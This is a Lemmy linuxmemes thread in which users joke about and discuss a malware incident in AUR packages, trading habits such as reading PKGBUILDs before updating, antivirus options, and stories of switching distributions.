this post was submitted on 15 Jun 2026

486 points (97.8% liked)

linuxmemes

31752 readers

1272 users here now

Hint: :q!

Sister communities:

Community rules (click to expand)

1. Follow the site-wide rules

Instance-wide TOS: https://legal.lemmy.world/tos/
Lemmy code of conduct: https://join-lemmy.org/docs/code_of_conduct.html

2. Be civil

Understand the difference between a joke and an insult.

Do not harrass or attack users for any reason. This includes using blanket terms, like "every user of thing".

Don't get baited into back-and-forth insults. We are not animals.

Leave remarks of "peasantry" to the PCMR community. If you dislike an OS/service/application, attack the thing you dislike, not the individuals who use it. Some people may not have a choice.

Bigotry will not be tolerated.

3. Post Linux-related content

Including Unix and BSD.

Non-Linux content is acceptable as long as it makes a reference to Linux. For example, the poorly made mockery of sudo in Windows.

No porn, no politics, no trolling or ragebaiting.

Don't come looking for advice, this is not the right community.

4. No recent reposts

Everybody uses Arch btw, can't quit Vim, <loves/tolerates/hates> systemd, and wants to interject for a moment. You can stop now.

5. 🇬🇧 Language/язык/Sprache

This is primarily an English-speaking community. 🇬🇧🇦🇺🇺🇸

Comments written in other languages are allowed.

The substance of a post should be comprehensible for people who only speak English.

Titles and post bodies written in other languages will be allowed, but only as long as the above rule is observed.

6. (NEW!) Regarding public figures

We all have our opinions, and certain public figures can be divisive. Keep in mind that this is a community for memes and light-hearted fun, not for airing grievances or leveling accusations.

Keep discussions polite and free of disparagement.

We are never in possession of all of the facts. Defamatory comments will not be tolerated.

Discussions that get too heated will be locked and offending comments removed.

Please report posts and comments that break these rules!

Important: never execute code or follow advice that you don't understand or can't verify, especially here. The word of the day is credibility. This is a meme community -- even the most helpful comments might just be shitposts that can damage your system. Be aware, be smart, don't remove France.

founded 3 years ago

MODERATORS

poopsmith@lemmy.world

zephyr@lemmy.world

rtxn@lemmy.world

486

Where the AUR users at? (lemmy.world)

submitted 18 hours ago by cannedtuna@lemmy.world to c/linuxmemes@lemmy.world

77 comments fedilink hide all child comments

top 50 comments

sorted by: hot top controversial new old

[–] gerryflap@feddit.nl 1 points 6 minutes ago

I learnt a lesson yeah. It looks like I got away, there's no rootkit, I found nothing weird running, I don't have npm Installed, and up until now it doesn't seem like the packages I had installed were compromised. But I had way more AUR packages installed than I was aware of. And I was just updating them without really caring about the pkgbuild, I have better things to do. Multiple packages were outdated crap that shouldn't have been there anymore.

I was careless and took too much risk. I reduced the Installed AUR packages to a minimum, and from now on I will verify the PKGBUILDs on every update. Maybe Arch isn't really what I need. I'm on the LTS kernel and I no longer really use the AUR. But switching will be a huge hassle and this setup will work well from here on out, so I'll stick to it for now

[–] OutOfBoundsJupiter@sh.itjust.works 1 points 7 minutes ago

ClamAV users, how's it going?

[–] Ghoelian@piefed.social 2 points 47 minutes ago (2 children)

So what are good antivirus options for Linux? is it still pretty much just ClamAV?

[–] Ghoelian@piefed.social 2 points 42 minutes ago

one thread I found from 2 years ago where someone asked for the same thing, a lot of the replies are just "you don't need antivirus on Linux" lmao

[–] Johanno@lemmy.dbzer0.com 1 points 26 minutes ago

Our company uses eset https://www.eset.com/us/home/antivirus/

But afaik it costs money to really work.

But your brain should be the best antivirus you have.

[–] Shanmugha@lemmy.world 4 points 1 hour ago

I am at "no fucking yays and the bunch, check the package create/update dates, read PKGBUILD, only update when necessary". Has served me well so far

[–] HisAssholiness@lemmy.ml 6 points 4 hours ago

Arch users just randomly dropping "I use Arch btw" everywhere, it was only a matter of time.

[–] Honytawk@discuss.tchncs.de 13 points 7 hours ago (1 children)

And you believe that makes you safe?

Shit like this is a blemish on the Linux community.

load more comments (1 replies)

[–] ornery_chemist@mander.xyz 8 points 7 hours ago (2 children)

I was on arch as a vestige from my school days, having never quite found the time to switch to something more stable. When I saw the news over the weekend, I checked and found 1 would-be-infected package on my machine that was thankfully months out of date. I'm well past the point of wanting to examine PKGBUILDs every time (hence the out of date package). But, instead of just removing AUR packages and sticking to arch repos, I decided to sweep up the technical debt by wiping and installing Fedora. I'm liking it so far, minus the absolute pain in the ass that is Nvidia on Linux. Fuck academics and their insistence on writing everything targeting CUDA; otherwise, I'd have saved a good bit of money a few years ago with a much more compatible AMD card.

[–] insomniac_lemon@lemmy.cafe 2 points 2 hours ago

Have you looked into drop-in (ZLUDA) or recompile (SCALE, chipStar) things? Though they may not have been helpful with the years gone by (and may each have their own pros/cons).

I'm still using a 1050Ti (and legacy driver shifting to AUR did block me from updating), value doesn't seem great and not going to buy something used from eBay. So that still complicates things for me.

Distro-wise I probably want something slower than Arch but not sure about point releases. And I am hoping for something that does updates in a way more friendly to slower internet (giving less update friction), but I suspect it doesn't exist. Some things (OpenSUSE, NixOS) seem like they might be closer to I want but I have hangups about them (Patterns on SUSE and lack of videos for Slowroll, NixOS having multiple solutions for dynamically linked executables especially if I decide to stop using Steam directly).

[–] Auth@lemmy.world -1 points 4 hours ago

Isnt it just a single line command to get nvidia working?

[–] Crashumbc@lemmy.world 42 points 10 hours ago (1 children)

The more popular Linux becomes, the less true this will be.

[–] nsh@lemmy.nz 5 points 3 hours ago

Avoid success at all costs - Simon Peyton Jones

[–] ILikeBoobies@lemmy.ca 3 points 5 hours ago* (last edited 5 hours ago)

Use the AUR, have an antivirus, no infected packages. However I was thinking of switching to https://chimera-linux.org/ before the infected packages went out.

[–] Kolanaki@pawb.social 4 points 6 hours ago

Custom OS that no one else has access to. It might be full of exploits and bugs, but only you would know that. 😉

[–] Speiser0@feddit.org 3 points 7 hours ago

My eyes, I look at AUR packages before building them, as any real arch user does. AFAIK, antivirus programs would do the same to compiled binaries, looking for suspicious things and blocking if it finds something.

[–] irelephant@lemmy.dbzer0.com 6 points 9 hours ago (1 children)

Security through insecurity

[–] irelephant@lemmy.dbzer0.com 3 points 9 hours ago

Though, Linux being open source helps a lot

[–] Don_alForno@feddit.org 15 points 12 hours ago

Also, an ad blocker.

[–] pleb_maximus@piefed.zip 5 points 10 hours ago

Hi there 👋

Don't have installed much from the AUR though.

[–] thagoat@lemmy.dbzer0.com 90 points 17 hours ago (2 children)

Never trust an NPM library

[–] redsand@infosec.pub 13 points 13 hours ago (1 children)

Fuck node

[–] HeHoXa@lemmy.zip 8 points 11 hours ago* (last edited 11 hours ago)

... technical name for glory hole

Your mom's a fuck node

[–] rozodru@piefed.world 8 points 12 hours ago

bu-but so many libraries need funding!

[–] DmMacniel@feddit.org 75 points 16 hours ago* (last edited 16 hours ago) (4 children)

Linux Users: haha those silly windows users, always searching the web for their software and getting viruses.
Linux Users: oh no I got malware by searching the AUR!

[–] riot@fedia.io 7 points 11 hours ago

AUR naur! for all my Australians out there.

[–] rtxn@lemmy.world 32 points 15 hours ago* (last edited 15 hours ago) (2 children)

The AUR is still safer. One, it is at least minimally moderated. If a malicious package is detected, it can be reported and removed. Two, the installer is usually not just a black box executable. Three, most of the build and runtime dependencies are from the official Arch repos, which provides some protection against supply chain attacks. For Windows installers, you have to trust the distributor to bundle clean DLLs (for that matter, the same applies to AppImages).

But if it starts downloading anything from NPM... ^C and run.

[–] 30p87@feddit.org 18 points 15 hours ago (2 children)

The most unsafe factor of the AUR is aur helpers and their goal to dumb everything down and streamline the process as if the AUR where an official repo

[–] CubitOom@infosec.pub 6 points 11 hours ago (1 children)

I'm not entirely sure I agree, I think the issue is with default settings.

Like you could use both yay and paru to diff the PKGBUILD of the most recent updat and then read it, and then approve each. And I think that's pretty helpful. But you could also just blindly accept the update with the right config or flag and that is not a good practice.

[–] bitfucker@programming.dev 1 points 38 minutes ago

Yeah, use and promote aurto instead. They require you to trust the maintainer and would remove the package from the local repo if the maintainer is changed

load more comments (1 replies)

[–] panda_abyss@lemmy.ca 34 points 16 hours ago (1 children)

Don’t worry, I found a package on npm to help!

[–] sudoMakeUser@sh.itjust.works 29 points 14 hours ago

load more comments (1 replies)

[–] Bishma@discuss.tchncs.de 38 points 15 hours ago* (last edited 15 hours ago) (6 children)

I don't use Arch, BTW. So the biggest NPM threat vector on my machine is still VSCode.

load more comments (6 replies)

[–] yesman@lemmy.world 45 points 16 hours ago (2 children)

Microslop is nervous now that Linux is popular enough to attack.

[–] imetators@lemmy.dbzer0.com 1 points 54 minutes ago

https://inv.nadeko.net/watch?v=aoag03mSuXQ

[–] CubitOom@infosec.pub 34 points 15 hours ago (1 children)

Linux has always been the bigger target. Even microslop uses linux for its severs.

[–] four@lemmy.zip 21 points 14 hours ago (1 children)

I'm gonna assume that their servers are not installing stuff from AUR though

[–] Goodlucksil@lemmy.dbzer0.com 9 points 12 hours ago

I would hope so too

[–] mintiefresh@piefed.ca 45 points 16 hours ago

btw, I use malware

[–] altphoto@lemmy.today 11 points 12 hours ago

With the old package managers safety was simple...trust the developers, user their packages. 10000 downloads? Easy! 1 download.... 🤔 Maybe skip for now.

Now with executables like mac and Windows it's easier to sneak something in. You still rely on trust. But now you've got AI in the game mudding the waters.

[–] avidamoeba@lemmy.ca 1 points 8 hours ago* (last edited 8 hours ago)

The unsandboxed package model was only ever safe in its original conception - with organizationally trusted and cryptographically enforced maintainer model. Remove the maintainer/developer trust requirement and you need a sandbox in order to prevent malware having root access on your system. Tis why mobile apps were sandboxed on Android and iOS from the get go.

[–] istdaslol@feddit.org 39 points 17 hours ago (3 children)

Inverted security by obscurity

load more comments (3 replies)

[–] CubitOom@infosec.pub 29 points 17 hours ago* (last edited 17 hours ago) (15 children)

I avoid orphaned packages and I wait a few days before I type yay

load more comments (15 replies)

load more comments